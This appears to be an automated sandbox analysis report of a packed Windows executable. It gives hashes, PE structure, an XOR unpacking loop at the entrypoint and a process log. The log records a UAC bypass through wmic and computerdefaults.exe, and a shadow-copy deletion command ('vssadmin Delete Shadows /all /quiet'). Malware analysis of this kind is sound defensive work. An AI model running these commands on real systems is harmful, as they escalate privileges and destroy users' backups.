                                                                                                SHA512:c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
                                                                                                SSDEEP:384:otLvArTA5n2Kc/vURgbHs19l897hkuzetFS/z1ANkp2RD0CwMiOQkSd:odvOM5UNMRS7W2AiEd08D
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.G...)...)...).,.....).,.....).,.....).Rich..).........PE..d....e.`.........."......R.....................@...................

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x140001000
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x140000000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                Time Stamp:0x60A7650C [Fri May 21 07:45:16 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:0
                                                                                                File Version Major:6
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                dec eax
                                                                                                mov dword ptr [esp+18h], ebx
                                                                                                push edi
                                                                                                dec eax
                                                                                                sub esp, 30h
                                                                                                mov bl, 1Bh
                                                                                                call 00007FFBA4C0A04Bh
                                                                                                dec eax
                                                                                                and dword ptr [esp+48h], 00000000h
                                                                                                dec esp
                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                dec eax
                                                                                                lea edx, dword ptr [esp+48h]
                                                                                                inc ebp
                                                                                                xor eax, eax
                                                                                                dec eax
                                                                                                or ecx, FFFFFFFFh
                                                                                                mov dword ptr [esp+28h], 00000040h
                                                                                                dec eax
                                                                                                mov edi, eax
                                                                                                dec eax
                                                                                                mov dword ptr [esp+40h], 00005086h
                                                                                                mov dword ptr [esp+20h], 00001000h
                                                                                                call 00007FFBA4C04F82h
                                                                                                dec eax
                                                                                                mov ecx, dword ptr [esp+48h]
                                                                                                xor edx, edx
                                                                                                dec eax
                                                                                                cmp dword ptr [esp+40h], edx
                                                                                                jbe 00007FFBA4C04F42h
                                                                                                xor eax, eax
                                                                                                mov al, byte ptr [eax+edi]
                                                                                                inc ecx
                                                                                                mov eax, 000000FEh
                                                                                                xor al, bl
                                                                                                add bl, FFFFFFFFh
                                                                                                mov byte ptr [ecx], al
                                                                                                movzx eax, bl
                                                                                                dec eax
                                                                                                inc ecx
                                                                                                test bl, bl
                                                                                                inc ecx
                                                                                                cmove eax, eax
                                                                                                inc edx
                                                                                                mov bl, al
                                                                                                mov eax, edx
                                                                                                dec eax
                                                                                                cmp eax, dword ptr [esp+40h]
                                                                                                jc 00007FFBA4C04EE9h
                                                                                                dec eax
                                                                                                mov ecx, dword ptr [esp+48h]
                                                                                                call ecx
                                                                                                dec eax
                                                                                                mov ebx, dword ptr [esp+50h]
                                                                                                dec eax
                                                                                                add esp, 30h
                                                                                                pop edi
                                                                                                ret
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                push esi
                                                                                                dec eax
                                                                                                mov esi, esp
                                                                                                dec eax
                                                                                                and esp, FFFFFFF0h
                                                                                                dec eax
                                                                                                sub esp, 20h
                                                                                                call 00007FFBA4C04E64h
                                                                                                dec eax
                                                                                                mov esp, esi
                                                                                                pop esi
                                                                                                ret
                                                                                                dec esp
                                                                                                mov edx, ecx
                                                                                                mov eax, 00000018h

                                                                                                Rich Headers

                                                                                                Programming Language:
                                                                                                • [ASM] VS2012 build 50727
                                                                                                • [LNK] VS2012 build 50727

                                                                                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x8000 | 0xc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5158 | 0x5200 | False | 0.908060213415 | zlib compressed data | 7.62659115899 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0xc | 0x200 | False | 0.048828125 | data | 0.188056906087 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata | 0x8000 | 0xc | 0x200 | False | 0.041015625 | data | 0.0776331623432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Network Behavior

                                                                                                No network behavior found

                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior


                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:19:15:13
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe'
                                                                                                Imagebase:0x7ff6ab570000
                                                                                                File size:23040 bytes
                                                                                                MD5 hash:7906DC475A8AE55FFB5AF7FD3AC8F10A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:19:15:14
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\sihost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff785e90000
                                                                                                File size:79360 bytes
                                                                                                MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:19:15:15
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff641cd0000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff641cd0000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:21
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\taskhostw.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff70cb30000
                                                                                                File size:87904 bytes
                                                                                                MD5 hash:CE95E236FC9FE2D6F16C926C75B18BAF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:24
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:24
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:24
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Disassembly

                                                                                                Code Analysis
